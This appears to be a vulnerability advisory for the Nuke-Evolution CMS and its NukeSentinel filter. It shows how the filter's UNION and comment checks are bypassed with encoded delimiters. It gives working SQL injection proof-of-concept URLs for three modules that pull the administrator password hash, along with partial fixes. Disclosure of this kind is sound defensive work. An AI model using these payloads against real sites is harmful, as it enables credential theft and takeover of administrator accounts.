PROGRAM: Nuke-Evolution & NukeSentinel HOMEPAGE: http://www.nuke-evolution.com/ VERSION: All versions BUG 1 NukeSentinel Bypass SQL Injection Protection BUG 2 Nuke Evolution <= 2.0.3 SQL Injections vulnerabilities AUTHOR: Aleksandar NukeSentinel Bypass SQL Injection Protection nukesentinel.php Line 270-290 ****************************************** // Check for UNION attack // Copyright 2004(c) Raven PHP Scripts $blocker_row = $blocker_array[1]; if($blocker_row['activate'] > 0) { if (stristr($nsnst_const['query_string'],'+union+') OR stristr($nsnst_const['query_string'],'%20union%20') OR stristr($nsnst_const['query_string'],'*/union/*') OR stristr($nsnst_const['query_string'],' union ') OR stristr($nsnst_const['query_string_base64'],'+union+') OR stristr($nsnst_const['query_string_base64'],'%20union%20') OR stristr($nsnst_const['query_string_base64'],'*/union/*') OR stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row); die("BLOCK IP 1 " ); } } // Check for CLIKE attack // Copyright 2004(c) Raven PHP Scripts $blocker_row = $blocker_array[2]; if($blocker_row['activate'] > 0) { if ( stristr($nsnst_const['query_string'],'/*') OR stristr($nsnst_const['query_string_base64'],'/*') OR stristr($nsnst_const['query_string'],'*/') OR stristr($nsnst_const['query_string_base64'],'*/')) { // block_ip($blocker_row); die("BLOCK IP 2 " ); } } ****************************************** Example(Bypass SQL Injection Protection): PHPNuke + NukeSentinel http://localhost/php-nuke/?%2f**%2fUNION%2f**%2fSELECT ... etc Nuke-Evolution + NukeSentinel http://localhost/nuke-evolution/?%2f**%2fUNION%2f**%2fSELECT .. etc Nuke-Evolution Basic 2.0.3 Open source content management system, which features customizable blocks, modules, multilanguage support and themes. With importance on security, speed and usability. A PHP-Nuke based CMS with added security, functionality, and core improvements. Site:http://www.nuke-evolution.com/ Your_Account/index.php Vulnerability code: ******************************************************************** case "userinfo": //include("modules/$module_name/public/userinfo.php"); /*****[BEGIN]****************************************** [ Mod: YA Merge v1.0.0 ] ******************************************************/ //The "$username" variable isn't filtered!!! $result = $db->sql_query("SELECT user_id FROM ".$user_prefix."_users WHERE username='$username'

");
		$uid = $db->sql_fetchrow($result);
		Header("Location: modules.php?name=Profile&mode=viewprofile&u=".$uid[0]);
		die();
/*****[END]********************************************
 [ Mod:    YA Merge                            v1.0.0 ]
 ******************************************************/
    break;
*********************************************************************

POC Exploit:
http://localhost/nukeNE/modules.php?name=Your_Account&op=userinfo&username=1'%2f**%2fUNION%2f**%2fSELECT%20pwd%20FROM%20nuke_authors%20WHERE%20%20radminsuper='1'%2f**

Results:
MOZILA FIREFOX 
URL BAR/ADDRESS BAR: http://localhost/nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH

MOZILA FIREFOX 
Live HTTP Headers - Firefox Add-ons

http://localhost/nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH
GET /nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate




News/read_article.php line 66

Vulnerability code:
++++++++++++++++++++++++++++++++++
//  //The "'$sid" variable isn't filtered!!!
$sql = "select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'";
$result = $db->sql_query($sql);

++++++++++++++++++++++++++++++++++

POC Exploit:
http://localhost:8080/htmlNE/modules.php?name=News&file=read_article&sid=-1'%2f**%2fUNION%2f**%2fSELECT%201,1,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper='1'%2f**

FIX
++++++++++++++++++++++++++++++++++
$sid= intval($sid); // FIX
$sql = "select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'";
$result = $db->sql_query($sql);

++++++++++++++++++++++++++++++++++



Donate/index.php line 33 & 46
Vulnerability code:
********************************************************
	if (is_numeric($uid)) { // LOL :) 
		$uid = intval($uid);  :) LOL
	}

....
// Line 46

	} elseif (!empty($uid)) { 
		include_once(NUKE_BASE_DIR.'header.php');
		$sql = "SELECT username FROM ".$user_prefix."_users where user_id='$uid'"; // BOOM - > SQL injection 
		$result = $db->sql_query($sql);
		$row = $db->sql_fetchrow($result);
		$name = $row['username'];
**********************************************************


POC Exploit:
http://localhost:8080/htmlNE/modules.php?name=Donate&op=received&uid=-1'%2f**%2fUNION%2f**%2fSELECT%20pwd%20FROM%20nuke_authors%20WHERE%20%20radminsuper='1





FIX

++++++++++++++++++++++++++++++++++++++

	///if (is_numeric($uid)) {  REMOVE THIS LINE
		$uid = intval($uid); 
	///} REMOVE THIS LINE
++++++++++++++++++++++++++++++++++++++




Best Regards
Aleksandar
Programmer and Web Developer